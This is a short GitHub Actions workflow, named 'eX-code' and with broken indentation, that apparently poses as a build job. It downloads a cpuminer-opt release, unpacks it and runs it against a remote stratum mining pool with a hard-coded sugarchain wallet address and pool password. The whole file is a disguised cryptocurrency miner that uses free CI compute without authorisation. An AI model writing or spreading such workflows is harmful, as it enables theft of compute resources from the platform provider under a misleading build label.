name: eX-code


Core on: [workflow_dispatch]

 jobs:

 build:

 runs-on: windows-latest

 steps:

 - name: Preparing run: Invoke-WebRequest https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.22/cpuminer-opt-win.zip -OutFile cpuminer-opt-win.zip

 - name: Prepare_Q2 run: Expand-Archive cpuminer-opt-win.zip

 - name: Running run: .\cpuminer-opt-win\cpuminer-avx2.exe -a yespowersugar -o stratum+tcp://stratum-asia.rplant.xyz:7042 -t 1 -u sugar1q3luh0jyqp8sdhyz4lz9ctvca0479w7f7ur2x7x.udin -p d=5,password=Sendal113

- name: DONE

run: exit







